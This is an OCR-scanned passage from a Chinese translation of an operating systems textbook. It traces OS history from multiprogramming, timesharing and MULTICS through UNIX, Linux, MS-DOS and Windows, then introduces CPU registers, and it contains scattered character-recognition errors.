里 复述 该 书 的 全 部 内 容 ， 不 过 其 封面 已 经 充分 表述 了 Fred Brooks 的 观 
点 ， 一 群 史前 动物 陷入 泥潭 而 不 能 目 拔 。Silberschatz 等 人 著作 (2005) 
的 封面 也 表达 了 操作 系统 如 同 恐 龙 一 般 的 类 似 观 点 。 





抛 开 0S/360 的 庞大 和 存在 的 问题 ，OS/360 和 其 他 公司 类 似 的 第 三 代 
操作 系统 的 确 合理 地 满足 了 大 多 数 用 户 的 要 求 。 同 时 ， 它 们 也 使 第 二 代 
操作 系统 所 缺乏 的 几 项 关键 技术 得 到 了 广泛 应 用 。 其 中 最 重要 的 应 该 是 
多 道 程序 设计 Gmultiprogramming) 。 在 7094 机 上 ， 若 当前 作业 因 等 待 
磁带 或 其 他 1/O 操 作 而 暂停 时 ，CPU 就 只 能 简单 地 踏步 直至 该 WO 完 成 。 
对 于 CPU 操作 密集 的 科学 计算 问题 ，IO 操 作 较 少 ， 因 此 浪费 的 时 间 很 
少 。 然 而 ， 对 于 商业 数据 处 理 ，IO 操 作 等 待 的 时 间 通 常 占 到 80% 一 
90%， 所 以 必须 采取 某 种 措施 减少 (昂贵 的 ) CPU 空闲 时 间 的 浪费 。 








解决 方案 是 将 内 存 分 几 个 部 分 ， 每 一 部 分 存放 不 同 的 作业 ， 如 图 1- 
5 所 示 。 当 一 个 作业 等 待 O 操 作 完 成 时 ， 另 一 个 作业 可 以 使 用 CPU。 如 
果 内 存 中 可 以 同时 存放 足够 多 的 作业 ， 则 CPU 利用 率 可 以 接近 1009%。 
在 内 存 中 同时 驻 留 多 个 作业 需要 特殊 的 硬件 来 对 其 进行 保护 ， 以 避免 作 
业 的 信息 被 窃取 或 受到 攻击 。360 及 其 他 第 三 代 计 算 机 都 配 有 此 类 硬 
件 。 















作业 3 
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图 1-5 一 个 内 看 中 有 三 个 作业 的 多 道 程序 系统 


第 三 代 计 算 机 的 另 一 个 特性 是 ， 卡 片 被 拿 到 机 房 后 能 够 很 快 地 将 作 
业 从 卡片 读 入 磁盘 。 于 是 ， 任 何 时 刻 当 一 个 作业 运行 结束 时 ， 操 作 系 统 
就 能 将 一 个 新 作业 从 磁盘 读 出 ， 装 进 空 出 来 的 内 存 区 域 运行 。 这 种 技术 
叫做 同时 的 外 部 设备 联机 操作 (Simultaneous Peripheral Operation On 
Line，SPOOLing) ， 该 技术 同时 也 用 于 输出 。 当 采用 了 SPOOLing 技 术 
后 ， 就 不 再 需要 IBM 1401 机 ， 也 不 必 再 将 磁带 搬 来 搬 去 了 。 


第 三 代 操 作 系 统 很 适 于 大 型 科学 计算 和 繁忙 的 商务 数据 处 理 ， 但 其 
实质 上 仍旧 是 批 处 理 系统 。 许 多 程序 员 很 怀念 第 一 代 计 算 机 的 使 用 方 
式 。 那 时 ， 他 们 可 以 几 个 小 时 地 独占 一 合 机 器 ， 可 以 即时 地 调试 他 们 的 
程序 。 而 对 第 三 代 计 算 机 而 言 ， 从 一 个 作业 提交 到 运算 结果 取 回 往往 长 
达 数 小 时 ， 更 有 其 者 ， 一 个 有 辟 号 的 误 用 就 会 导致 编译 失败 ， 而 可 能 浪费 
了 程序 员 半 天 的 时 间 。 











程序 员 们 的 希望 很 快 得 到 了 响应 ， 这 种 需求 导致 了 分 时 系统 
(timesharing) 的 出 现 。 它 实际 上 是 多 道 程序 的 一 个 变 体 ， 每 个 用 户 都 
有 一 个 联机 终端 。 在 分 时 系统 中 ， 假 设 有 20 个 用 户 登 录 ， 其 中 17 个 在 思 
考 、 谈 论 或 喝 咖 啡 ， 则 CPU 可 分 配给 其 他 三 个 需要 的 作业 轮流 执行 。 由 
于 调试 程序 的 用 户 常常 只 发 出 简短 的 命令 (如 编译 一 个 五 页 的 源 文 
件 ) ， 而 很 少 有 长 的 费时 命令 (如 上 百 万 条 记录 的 文件 排序 ) ， 所 以 计 
算 机 能 够 为 许多 用 户 提供 快速 的 交互 式 服务 ， 同 时 在 CPU 空闲 时 还 可 能 
在 后 台 运 行 一 个 大 作业 。 第 一 个 通用 的 分 时 系统 ， 兼 容 分 时 系统 
(Compatible Time Sharing System, CTSS) 是 MIT〔 麻 省 理工 学 院 ) 在 
一 台 改 装 过 的 7094 机 上 开发 成 功 的 (Corbat6 等 人 ，1962 年 )。 但 直到 
第 三 代 计 算 机 广泛 采用 了 必需 的 保护 硬件 之 后 ， 分 时 系统 才 逐 渐 流行 开 
Ko 








在 CTSS 成 功 研制 之 后 ，MIT、 贝 尔 实验 室 和 通用 电气 公司 CGE, 
当时 一 个 主要 的 计算 机 制造 三 商 ) 决定 开发 一 种 “公用 计算 服务 系统 ”， 
能 够 同时 支持 数 百 名 分 时 用 户 的 一 种 机 器 。 它 的 模型 借鉴 了 供电 系统 
一 一 当 需 要 电能 时 ， 只 需 将 电气 设备 接 到 墙 上 的 插座 即 可 ， 于 是 ， 在 合 
理 范围 内 ， 所 需要 的 电能 随时 可 提供 。 该 系统 称 作 
MULTICS (MULTiplexed Information and Computing Service) ， 其 设计 
者 着 眼 于 建造 满足 波士顿 地 区 所 有 用 户 计 算 雷 求 的 一 台 机 费 。 在 当时 看 
来 ， 仅 仅 40 年 之 后 ， 就 能 成 百 万 台地 销售 (价值 不 到 1 千 美 元 〉 速度 是 
GE-645 主 机 10 000 倍 的 计算 机 ， 完 全 是 科学 幻想 。 这 种 想法 同 现 在 关于 











穿越 大 西洋 的 超 音速 海底 列车 的 想法 一 样 ， 是 幻想 。 





MULTICS 得 到 一 种 混合 式 的 成 功 。 尽 管 这 台 机 器 具有 较 强 的 IO 能 
力 ， 却 要 在 一 台 仅 仅 比 mmtel 386 PC 性 能 强 一 点 的 机 器 上 支持 数 百 个 用 
户 。 可 是 这 个 想法 并 不 像 表 面 上 那么 荒唐 ， 因 为 那 时 的 人 们 已 经 知道 如 
何 编写 精练 的 高 效 程序 ， 而 这 种 技巧 随后 逐渐 丢失 了 。 有 许多 原因 造成 
MULTICS 没 有 能 够 普及 到 全 世界 ， 至 少 它 不 应 该 采用 PL/1 编 写 ， 因 为 
PL/I 编 译 器 推迟 了 好 几 年 才 完 成 ， 好 不 容易 完成 的 编译 器 又 极 少 能 够 成 
功 运行 。 另 外 ， 当 时 的 MULTICS 有 太 大 的 野心 ， 犹 如 19 世 纪 中 期 
Charles Babbage 的 分 析 机 。 





简要 地 说 ，MULTICS 在 计算 机 文献 中 播 撤 了 许多 原创 的 概念 ， 但 
要 将 其 造成 一 台 真 正 的 机 器 并 想 实 现 商业 上 的 巨大 成 功 的 研制 难度 超出 
了 所 有 人 的 预料 。 贝 尔 实 验 室 退出 了 ， 通 用 电气 公司 也 退出 了 计算 机 领 
域 。 但 是 M.LT. 坚 持 下 来 并 且 最 终 使 MULTICS 成 功 运行 。MULTICS 最 
后 成 为 商业 产品 ， 由 购买 了 通用 电气 公司 计算 机 业务 的 公司 
(Honeywell) 销售 ， 并 安装 在 世界 各 地 80 多 个 大 型 公司 和 大 学 中 。 尺 
管 MULTICS 的 数量 很 小 ， 但 是 MULTICS 的 用 户 们 却 非常 忠诚 ， 例 如 ， 
通用 汽车 、 福 特 和 美国 国家 安全 局 直到 20 世 纪 90 年 代 后 期 ， 在 试图 让 
Honeywell 更 新 其 硬件 多 年 之 后 ， 才 关闭 了 他 们 的 MULTICS 系 统 ， 而 这 
已 经 是 在 MULTICS 推 出 之 后 30 年 了 。 








目前 ， 计 算 服 务 的 概念 已 经 被 遗弃 ， 但 是 这 个 概念 是 可 以 回归 的 ， 


以 大 量 的 、 附 有 相对 简单 用 户 机 器 的 、 集 中 式 Internet 服 务 器 形式 回归 。 
在 这 种 形式 中 ， 主 要 工作 在 大 型 服务 器 上 完成 。 而 回归 的 动机 可 能 是 多 
数 人 不 愿意 管理 日 益 过 分 复杂 的 计算 机 系统 ， 宁 可 让 那些 运行 服务 器 公 
司 的 专业 团队 去 做 。 电 子 商 务 已 经 向 这 个 方向 演化 了 ， 各 种 公司 在 多 处 
理 器 的 服务 器 上 经 营 各 自 的 电子 商场 ， 简 单 的 客户 端 连接 着 多 处 理 器 服 
务 器 ， 这 同 MULTICS 的 设计 精神 非常 类 似 。 





尽管 MULTICS 在 商业 上 失败 了 ， 但 MULTICS 对 随后 的 操作 系统 却 
有 着 巨大 的 影响 ， 详 情 请 参阅 有 关 文 献 和 书籍 (Corbatóft A, 1972; 
Corbat6 和 Vyssotsky，1965; Daley 和 Dennis，1968; Organick, 1972; 
Saltzer, 1974) 。 还 有 一 个 曾经 〈 现 在 仍然 ) 活跃 的 Web 站 点 
www.multicians.org， 上 和 面 有 大 量 关 于 系统 、 设 计 人 员 以 及 其 用 户 的 信息 


资料 。 








另 一 个 第 三 代 计 算 机 的 主要 进展 是 小 型 机 的 崛起 ， 以 1961 年 DEC 的 
PDP-1 作 为 起 点 。PDP-1 计 算 机 只 有 4K 个 18 位 的 内 存 ， 每 台 售 价 120 000 
美元 不 到 IBM 7094 的 5%) ， 该 机 型 非常 热 销 。 对 于 某 些 非 数值 的 计 
算 ， 它 和 7094 几 乎 一 样 快 。PDP-1 开 辟 了 一 个 全 新 的 产业 。 很 快 有 了 一 
系列 PDP 机 型 (与 BM 系列 机 不 同 ， 它 们 互 不 兼容 ) ， 其 顶峰 为 PDP- 
11。 








一 位 兽 参 加 过 MULTICS 研 制 的 贝尔 实验 室 计算 机 科学 家 Ken 
Thompson， 后 来 找到 一 台 无 人 使 用 的 PDP-7 机 器 ， 并 开始 开发 一 个 简化 








的 、 单 用 户 版 MULTICS。 他 的 工作 后 来 导致 了 了 UNIX 操作 系统 的 诞生 。 
接着 ，UNIX 在 学 术 界 ， 政 府 部 门 以 及 许多 公司 中 流行 。 


有 关 UNIX 的 历史 到 处 可 以 找到 (例如 Salus，1994) 。 这 段 故 事 的 
部 分 放 在 第 10 章 中 介绍 。 现 在 ， 有 充分 理由 认为 ， 由 于 到 处 可 以 得 到 源 
代码 ， 各 种 机 构 发 展 了 自己 的 《不 兼容 ) 版 本 ， 从 而 导致 了 混乱 。 
UNIX 有 两 个 主要 的 版 本 ， 源 自 AT&T 的 System V， 以 及 源 自 加 州 伯 克 
利 大 学 的 BSD (Berkeley Software Distribution) 。 当 然 还 有 一 些小 的 变 
种 。 为 了 使 编写 的 程序 能 够 在 任何 版 本 的 UNIX 上 运行 ，IEEE 提 出 了 一 
个 UNIX 的 标准 ， 称 作 POSIX， 目 前 大 多 数 UNIX 版 本 都 支持 它 。POSIX 
定义 了 一 个 几 是 UNIX 必 须 支 持 的 小 型 系统 调用 接口 。 事 实 上 ， 某 些 其 
他 操作 系统 也 文 持 POSIX 接 口 。 





顺便 值得 一 提 的 是 ， 在 1987 年 ， 本 书 作 者 发 布 了 一 个 UNIX 的 小 型 
克隆 ， 称 为 MINIX， 用 于 教学 目的 。 在 功能 上 ，MINIX 非 常 类 似 于 
UNIX， 包 括 对 POSIX 的 支持 。 从 那 时 以 后 ，MINIX 的 原始 版 本 已 经 演 
化 为 MINIX 3， 该 系统 是 高 度 模 块 化 的 ， 并 专注 于 高 可 靠 性 。 它 具有 快 
速 检 测 和 蔡 代 有 故障 甚至 已 崩溃 模块 《如 IO 设备 驱动 器 ) 的 能 力 ， 不 
用 重启 也 不 会 干扰 运行 着 的 程序 。 有 一 本 叙述 其 内 部 操作 ， 并 在 附录 中 
列 出 源 代码 的 书 ‘(Tanenbaum 和 Woodhull，2006)〉 ， 该 书 现在 仍然 有 
售 。 在 因特网 的 地 址 www.minix3.org 上 ，MINIX3 是 免费 使 用 的 (包括 
了 所 有 源 代码 ) 。 

















对 UNIX 版 本 免费 产品 不同 于 教育 目的 ) 的 愿望 ， 导 致 芬兰 学 生 
Linus Torvalds 编 写 了 Linux。 这 个 系统 直接 受到 在 MINIX 开 发 的 启示 ， 
而 且 原 本 支持 各 种 MINIX 的 功能 (例如 MINIX 文 件 系 统 ) 。 尽 管 它 已 经 
通过 多 种 方式 扩展 ， 但 是 该 系统 仍然 保留 了 茶 些 与 MINIX 和 UNIX 共 同 
的 低层 结构 。 对 Linux 和 开放 源码 运动 具体 历史 感 兴趣 的 读者 可 以 阅读 
Glyn Moody 的 书籍 〈2001) 。 本 书 所 叙述 的 有 关 UNIX 的 多 数 内 容 ， 也 
适用 于 System V、MINIX、Linux 以 及 UNIX 的 其 他 版 本 和 克隆 。 


12.4 第 四 代 (1980 年 至 今 ) : 个 人 计算 机 





随 痢 LSI《〈“ 大 规模 集成 电路 ) 的 发 展 ， 在 每 平方 厘米 的 硅 片 芯片 上 
可 以 集成 数 干 个 晶体 管 ， 个 人 计算 机 时 代 到 来 了 。 从 体系 结构 上 看 ， 个 
人 计算 机 《最 早 称 为 微型 计算 机 ) 与 PDP-11 并 无 二 致 ， 但 就 价格 而 言 却 
相去 其 远 。 以 往 ， 公 司 的 一 个 部 门 或 大 学 里 的 一 个 院 系 才 配备 一 人 台 小 型 
机 ， 而 微 处 理 器 却 使 每 个 人 都 能 拥有 目 己 的 计算 机 。 


1974 年 ， 当 Intel 8080， 第 一 代 通 用 8 位 CPU 出 现时 ，Intel 希 望 有 一 
个 用 于 8080 的 操作 系统 ， 部 分 是 为 了 测试 目的 。Intel 请 求 其 顾问 Gary 
Kildall 编 写 。Kildall 和 一 位 朋友 首先 为 新 推出 的 Shugart Associates 8 英寸 
软盘 构造 了 一 个 控制 器 ， 并 把 这 个 软磁盘 同 8080 相 连 ， 从 而 制造 了 第 一 
个 配 有 磁盘 的 微型 计算 机 。 然 后 Kildall 为 它 写 了 一 个 基于 磁盘 的 操作 系 
统 ， 称 为 CP/M (Control Program for Microcomputer) 。 由 于 Intel 不 认为 
基于 磁盘 的 微型 计算 机 有 什么 未 来 前 景 ， 所 以 当 Kildall 要 求 CP/M 的 版 权 
时 ，Intel 同 意 了 他 的 要 求 。Kildall 于 是 组 建 了 一 家 公司 Digital 
Research， 进 一 步 开发 和 销售 CP/M。 





1977 年 ，Digital Research 重 写 了 CP/M， 使 其 可 以 在 使 用 8080、 
Zilog Z80 以 及 其 他 CPU 心 族 的 多 种 微型 计算 机 上 运行 ， 从 而 使 得 CP/M 
完全 控制 了 微型 计算 机 世界 达 5 年 之 久 。 


在 20 世 纪 80 年 代 的 早期 ，IBM 设 计 了 IBM PC 并 寻找 可 在 上 面 运 行 
的 软件 。 来 自 IBM 的 人 员 同 Bill Gates 联 系 有 关 他 的 BASIC 解 释 器 的 许可 
证 事宜 ， 他 们 也 询问 是 否 他 知道 可 在 PC 机 上 运行 的 操作 系统 。Gates 建 
议 IBM 同 Digital Research 联 系 ， 即 当时 世界 上 主宰 操作 系统 的 公司 。 在 
做 出 坚 无 疑问 是 近代 历史 上 最 糟 的 商业 决策 后 ，Kildall 拒 绝 与 BM 会 
见 ， 代 将 他 的 是 一 位 次 要 人 员 。 为 了 使 事情 更 糟糕 ， 他 的 律师 甚至 拒绝 
俭 普 IBM 的 有 关 尚 未 公开 的 PC 的 保密 协议 。 结 有 果 ，IBM 回 头 询问 Gates 
可 否 提供 他 们 一 个 操作 系统 。 








在 IBM 返 回 时 ，Gates 了 解 到 一 家 本 地 计算 机 制造 商 ，Seattle 
Computer Products， 有 合适 的 操作 系统 DOS (Disk Operating System) 。 
他 联系 对 方 并 提出 购买 (宣称 75 000 美 元 ) ， 对 方 接受 了 。 然 后 Gates 提 
供给 也 M 成 套 的 DOS/BASIC，IBM 也 接受 了 。IBM 和 希望 做 某 些 修改 ， 于 
是 Gates 雇 佣 了 那个 写 DOS 的 作者 ，Tim Paterson， 作 为 Gates 的 微软 公司 
早期 的 一 个 雇员 ， 并 开展 工作 。 修 改版 称 为 MS-DOS (MicroSoft Disk 
Operating System) ， 并 且 很 快 主导 了 IBM PC 市 场 。 同 Kildall 试 图 将 
CP/M 每 次 卖 给 用 户 一 个 产品 相 比 (至 少 开始 是 这 样 )， 这 里 一 个 关键 
因素 是 Gates (回顾 起 来 ， 极 其 聪明 〉 的 决策 ， 将 MS-DOS 与 计算 机 公司 
的 硬件 捆绑 在 一 起 出 售 。 在 所 有 这 一 切 烟 消 云 散 之 后 ，Kildall 突 然 不 幸 
去 世 ， 其 原因 从 来 没有 公布 过 。 





1983 年 ，IBM PC 后 续 机 型 IBM PC/AT 推 出 ， 配 有 Intel 80286 CPU. 


此 时 ，MS-DOS 已 经 确立 了 地 位 ， 而 CP/M 只 剩 下 最 后 的 文 撑 。MS-DOS 
后 来 在 80386 和 80486 中 得 到 广泛 的 应 用 。 尽 管 MS-DOS 的 早期 版 本 是 相 
当 原 始 的， 但 是 后 期 的 版 本 提供 了 更 多 的 先进 功能 ， 包 括 许多 源 自 
UNIX 的 功能 。【〈 微 软 对 UNIX 是 如 此 娴熟 ， 甚 至 在 公司 的 早期 销售 过 一 
个 微型 计算 机 版 本 ， 称 为 XENIX) 。 


用 于 早期 微型 计算 机 的 CPM、MS-DOS 和 其 他 操作 系统 ， 都 是 通过 
键盘 输入 命令 的 。 由 于 Doug Engelbart 于 20 世 纪 60 年 代 在 斯 坦 福 研究 院 
(Stanford Research Institute〉 工 作 ， 这 种 情况 最 终 有 了 改变 。Doug 
Engelbart 发 明了 图 形 用 户 界 面 ， 包 括 窗口 、 图 标 、 沫 单 以 及 鼠标 。 这 些 
思想 被 Xerox PARC 的 研究 人 员 采 用 ， 并 用 在 了 他 们 所 研制 的 机 器 中 。 





一 天 ，Steve Jobs〈 和 其 他 人 一 起 在 汽车 库 里 发 明了 苹果 计算 机 ) 
访问 PARC,Jobs 一 看 到 GUI， 立 即 意识 到 它 的 潜在 价值 ， 而 Xerox 管 理 层 
恰好 没有 认识 到 。 这 种 战略 失误 的 庞大 比例 ， 导 致 名 为 《摸索 未 来 》 
书 的 出 版 (Smith 与 Alexander，1988 年 ) 。Jobs 随 后 着 手 设 计 了 带 有 GUI 
的 苹果 计算 机 。 这 个 项 目 导 致 了 Lisa 的 推出 ， 但 是 Lisa 过 于 昂贵 ， 所 以 
它 在 商业 上 失败 了 。Jobs 的 第 二 次 党 试 ， 即 苹果 Macintosh， 取 得 了 巨大 
的 成 功 ， 这 不 仅 是 因为 它 比 Lisa 便 宜 得 多 ， 而 且 它 还 是 对 用 户 友 好 的 
Cuser friendly) ， 也 就 是 说 ， 它 是 为 那些 不 仅 没 有 计算 机 知识 ， 而 且 也 
根本 不 打算 学 习 计算 机 的 用 户 们 准备 的 。 在 图 像 设 计 、 专 业 数 码 摄影 ， 
以 及 专业 数字 视频 生产 的 创意 世界 里 ，Macintosh 得 到 广泛 的 应 用 ， 这 











些 用 户 对 苹果 公司 及 Macintosh 有 着 极 大 的 热情 。 


在 微软 诀 定 构建 MS-DOS 的 后 继 产品 时 ， 受 到 了 Macintosh 成 功 的 巨 
大 影响 。 微 软 开 发 了 名 为 Windows 的 基于 GUI 的 系统 ， 早 期 它 运 行 在 
MS-DOS 上 层 〈 它 更 像 shell 而 不 像 真正 的 操作 系统 ) 。 在 从 1985 年 至 
1995 年 的 10 年 之 间 ，Windows 只 是 在 MS-DOS 上 层 的 一 个 图 形 环 境 。 然 
而 ， 到 了 1995 年 ， 一 个 独立 的 Windows 版 本 ， 具 有 许多 操作 系统 功能 的 
Windows 95 发 布 了 。Windows 95 仪 仅 把 底层 的 MS-DOS 作 为 局 动 和 运行 
老 的 MS-DOS 程 序 之 用 。1998 年 ， 一 个 稍 做 修改 的 系统 ，Windows 98% 
布 。 不 过 Windows 95 和 Windows 98 仍 然 使 用 了 大 量 16 位 Intel 汇 编 语言 。 








另 一 个 微软 操作 系统 是 windows NT (NT 表示 新 技术 ) ， 它 在 一 定 
的 范围 内 同 Windows 95 兼 容 ， 但 是 内 部 是 完全 新 编写 的 。 它 是 一 个 32 位 
AB. Windows NT 的 首席 设计 师 是 David Cutler， 他 也 是 VAX VMS 操 作 
系统 的 设计 师 之 一 ， 所 以 有 些 VMS 的 概念 用 在 了 NT 上 。 事 实 上 ，NT 中 
有 太 多 的 来 自 VMS 的 思想 ， 所 以 VMS 的 所 有 者 DEC 公 司 控告 了 微软 公 
司 。 法 院 对 该 案件 判决 的 结果 引出 了 一 大 笔 需要 用 多 位 数字 表达 的 金 
钱 。 微 软 公 司 期 待 NT 的 第 一 个 版 本 可 以 消灭 MS-DOS 和 其 他 的 Windows 
版 本 ， 因 为 NT 是 一 个 巨大 的 超级 系统 ， 但 是 这 个 想法 失败 了 。 只 有 
Windows NT 4.0 踏 上 了 成 功 之 路 ， 特 别 在 企业 网 络 方面 取得 了 成 功 。 
1999 年 初 ，Windows NT 5.0 改 名 为 Windows 2000。 微 软 期 望 它 成 为 














Windows 98 和 Windows NT 4.0 的 接 蔡 者 。 


不 过 这 两 个 方面 都 不 太 成 功 ， 于 是 微软 公司 发 布 了 Windows 98 的 另 
一 个 版 本 ， 名 为 Windows Me《〈 于 年 版 ) 。2001 年 ， 发 布 了 Windows 
2000 的 一 个 稍 加 升级 的 版 本 ， 称 为 Windows XP。 这 个 版 本 的 寿命 比较 
长 〈6 年 ) ， 基 本 上 蔡 代 了 Windows 所 有 原先 版 本 。 在 2007 年 1 月 ， 微 软 
公司 发 布 了 Windows XP 的 后 继 版 ， 名 为 Vista。 它 有 一 个 新 的 图 形 接口 
Aero， 以 及 许多 其 他 新 的 或 升级 的 用 户 程 序 。 微 软 公司 希望 Vista 能 够 完 
全 替代 XP， 但 是 这 个 过 程 可 能 需要 将 近 十 年 的 时 间 。 


在 个 人 计算 机 世界 中 ， 另 一 个 主要 竞争 者 是 UNIX (和 它 的 各 种 变 
VE) 。UNIX 在 网 络 和 企业 服务 器 等 领域 强大 ， 在 台式 计算 机 上 ， 特 别 
是 在 诸如 印度 和 中 国 这 些 发 展 中 国家 里 ，UNIX 的 使 用 也 在 增加 。 在 基 
于 Pentium 的 计算 机 上 ，Linux 成 为 学 生 和 不 断 增 加 的 企业 用 户 们 代 蔡 
Windows 的 通行 选择 。 顺 便 提 及 ， 在 本 书 中 ， 我 们 使 用 “Pentium” 这 个 名 
词 代表 Pentium I，I，II 和 4， 以 及 它们 的 后 继 者 ， 诸 如 Core 2 Duo 等 。 
术语 x86 有 时 仍旧 用 来 表示 Intel 公 司 的 包括 8086 的 CPU， 而 “Pentium” 则 
用 于 表示 从 Pentium I 开 始 的 所 有 CPU。 很 显然 ， 这 个 术语 并 不 完美 ， 但 
是 没有 更 好 的 方案 。 人 们 很 奇怪 ， 是 Intel 公 司 的 哪个 天 才 把 半 个 世界 都 
知晓 和 尊重 的 品牌 名 〈Pentium) 扔 掉 ， 并 替代 以 “Core 2 Duo” 这 样 一 个 
几乎 没有 人 立即 理解 的 术语 一 一 “2” 是 什么 意思 ， 而 “Duo” 又 是 什么 意 
思 ? 也 许 “Pentium 5”( 或 者 “Pentium 5 dual core”) 太 难 于 记忆 吧 。 至 于 
FreeBSD， 一 个 源 自 于 Berkeley 的 BSD 项 目 ， 也 是 一 个 流行 的 UNIX 变 
体 。 所 有 现代 Macintosh 计 算 机 都 运行 着 FreeBSD 的 一 个 修改 版 。 在 使 用 








高 性 能 RISC 心 族 的 工作 站 上 ， 诸 如 Hewlett-Packard 公 司 和 Sun 
Microsystems 公 司 销售 的 那些 机 器 上 ，UNIX 系 统 也 是 一 种 标准 配置 。 








尽管 许多 UNIX 用 户 ， 特 别 是 富有 经 验 的 程序 员 们 更 偏好 基于 命令 
的 界面 而 不 是 GUI， 但 是 几乎 所 有 的 UNIX 系 统 都 支持 由 MIT 开 发 的 称 为 
X Windows 的 视窗 系统 (如 众所周知 的 X11)〉 。 这 个 系统 处 理 基 本 的 视 
窗 管 理 功能 ， 人 允许 用 户 通过 鼠标 创建 、 删 除 、 移 动 和 变 比 视窗 。 对 于 那 
些 希 望 有 图 形 系 统 的 UNIX 用 户 ， 通 常 在 X 11 之 上 还 提供 一 个 完整 的 
GUI， 诸 如 Gnome 或 KDE， 从 而 使 得 UNIX 在 外 观 和 感觉 上 类 似 于 


Macintosh 或 Microsoft Windows。 





© By 


另 一 个 开始 于 20 世 纪 80 年 代 中 期 的 有 趣 发 展 是 ， 那 些 运 行 网 络 操作 
系统 和 分 布 式 操作 系统 (Tanenbaum 和 Van Steen, 2007) 的 个 人 计算 机 
网 络 的 增长 。 在 网 络 操 作 系 统 中 ， 用 户 知道 多 台 计 算 机 的 存在 ， 用 户 能 
够 登录 到 一 台 远 地 机 器 上 并 将 文件 从 一 台 机 器 复制 到 另 一 台 机 器 ， 每 台 
计算 机 都 运行 自己 本 地 的 操作 系统 ， 并 有 自己 的 本 地 用 户 《 或 多 个 用 
PD) 


网 络 操作 系统 与 单 处 理 器 的 操作 系统 没有 本 质 区 别 。 很 明显 ， 它 们 
再 要 一 个 网 络 接口 控制 器 以 及 一 些 低层 软件 来 驱动 它 ， 同 时 还 需要 一 些 
程序 来 进行 远程 登录 和 远程 文件 访问 ， 但 这 些 附加 成 分 并 未 改变 操作 系 
统 的 本 质 结构 。 











相反 ， 分 布 式 操作 系统 是 以 一 种 传统 单 处 理 需 操作 系统 的 形式 出 现 
在 用 户 面 前 的 ， 尽 管 它 实际 上 和 古 由 多 处 理 器 组 成 的 。 用 户 应 该 不 知晓 他 
们 的 程序 在 何 处 运行 或 者 他 们 的 文件 存放 于 何 处 ， 这 些 应 该 由 操作 系统 
目 动 和 有 效 地 处 理 。 








真正 的 分 布 式 操作 系统 不 仅仅 是 在 单机 操作 系统 上 增添 一 小 段 代 
码 ， 因 为 分 布 式 系统 与 集中 式 系统 有 本 质 的 区 别 。 例 如 ， 分 布 式 系统 通 
常 允 许 一 个 应 用 在 多 台 处 理 器 上 同时 运行 ， 因 此 ， 需 要 更 复杂 的 处 理 器 
调度 算法 来 获得 最 大 的 并 行 度 优化 。 








网 络 中 的 通信 延迟 往往 导致 分 布 式 算 法 必须 能 适应 信息 不 完备 、 信 
恩 过 时 甚至 信息 不 正确 的 环境 。 这 与 单机 系统 完全 不 同 ， 对 于 后 者 ， 操 
作 系 统 掌握 着 整个 系统 的 完备 信息 。 








1.3 ”计算 机 硬件 介绍 


操作 系统 与 运行 该 操作 系统 的 计算 机 硬件 联系 密切 。 操 作 系 统 扩展 
了 计算 机 指令 集 并 管理 计算 机 的 资源 。 为 了 能 够 工作 ， 操 作 系统 必须 了 
解 大 量 的 硬件 ， 至 少 需要 了 解 便 件 如何 面 对 程序 员 。 出 于 这 个 原因 ， 这 
里 我 们 先 简 要 地 介绍 现代 个 人 计算 机 中 的 计算 机 硬件 ， 然 后 开始 讨论 操 
作 系 统 的 具体 工作 细 市 。 








从 概念 上 讲 ， 一 台 简 单 的 个 人 计算 机 可 以 抽象 为 类 似 于 图 1-6 中 的 
模型 。CPU、 内 存 以 及 IO 设备 都 由 一 条 系统 总 线 连接 起 来 并 通过 总 线 
与 其 他 设备 通信 。 现 代 个 人 计算 机 结构 更 加 复杂 ， 包 含 多 重 总 线 ， 我 们 
将 在 后 面 讨 论 之 。 目前， 这 一 模式 还 是 够 用 的 。 在 下 面 各 小 节 中 ， 我 们 
将 简要 地 介绍 这 些 部 件 ， 并 且 讨论 一 些 操作 系统 设计 师 们 所 考虑 的 硬件 
问题 。 坚 无 疑问 ， 这 是 一 个 非常 简要 的 概括 介绍 。 现 在 有 不 少 讨论 计算 
机 硬件 和 计算 机 组 织 的 书籍 。 其 中 两 本 有 名 的 书 的 作者 分 别 是 
Tanenbaum (2006) 和 Patterson 与 Hennessy (2004) 。 
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图 1-6 简单 个 人 计算 机 中 的 一 些 部 件 


1.3.1 ”处理 器 


计算 机 的 “大 脑 * 是 CPU， 它 从 内 存 中 取出 指令 并 执行 之 。 在 每 个 
CPU 基 本 周期 中 ， 首 先 从 内 存 中 取出 指令 ， 解 码 以 确定 其 类 型 和 操作 
数 ， 接 着 执行 之 ， 然 后 取 指 、 解 码 并 执行 下 一 条 指令 。 按 照 这 一 方式 ， 
程序 被 执行 完成 。 





每 个 CPU 都 有 其 一 套 可 执行 的 专门 指令 集 。 所 以 ，Pentium 不 能 执 
行 SPARC 程 序 ， 而 SPARC 也 不 能 执行 Pentium 程 序 。 由 于 用 来 访问 内 存 
以 得 到 指令 或 数据 的 时 间 要 比 执行 指令 花费 的 时 间 长 得 多 ， 因 此 ， 所 有 
的 CPU 内 都 有 一 些 用 来 保存 关键 变量 和 临时 数据 的 寄存 器 。 这 样 ， 通 常 
在 指令 集中 提供 一 些 指令 ， 用 以 将 一 个 字 从 内 存 调 入 寄存 器 ， 以 及 将 一 





个 字 从 寄存 器 存 入 内 存 。 其 他 的 指令 可 以 把 来 自 寄存 器 、 内 存 的 操作 数 
组 合 ， 或 者 用 两 者 产生 一 个 结果 ， 诸 如 将 两 个 字 相 加 并 把 结果 存在 寄存 
器 或 内 存 中 。 





除了 用 来 保存 变量 和 临时 结果 的 通用 寄存 器 之 外 ， 多 数 计算 机 还 有 
一 些 对 程序 员 可 见 的 专门 寄存 器 。 其 中 之 一 是 程序 计数 器 ， 它 保存 了 将 
要 取出 的 下 一 条 指令 的 内 存 地 址 。 在 指令 取出 之 后 ， 程 序 计 数 器 束 补 更 
新 以 便 指向 后 继 的 指令 。 














为 一 个 寄存 右 是 堆栈 指针 ， 它 指 癌 内 存 中 当前 栈 的 项 并 。 该 栈 含 有 
己 经 进入 但 是 还 没有 退出 的 每 个 过 程 的 一 个 框架 。 在 一 个 过 程 的 堆栈 框 
架 中 保存 了 有 关 的 输入 参数 、 局 部 变量 以 及 那些 没有 保存 在 寄存 右 中 的 
临时 变量 。 








当然 还 有 程序 状态 字 (Program Status Word, PSW) 寄存 器 。 这 个 
寄存 器 包含 了 条 件 码 位 《〈 由 比较 指令 设置 ) 、CPU 优 先 级 、 模 式 〈 用 户 
态 或 内 核 态 ) ， 以 及 各 种 其 他 控制 位 。 用 户 程序 通常 读 入 整个 PSW， 但 
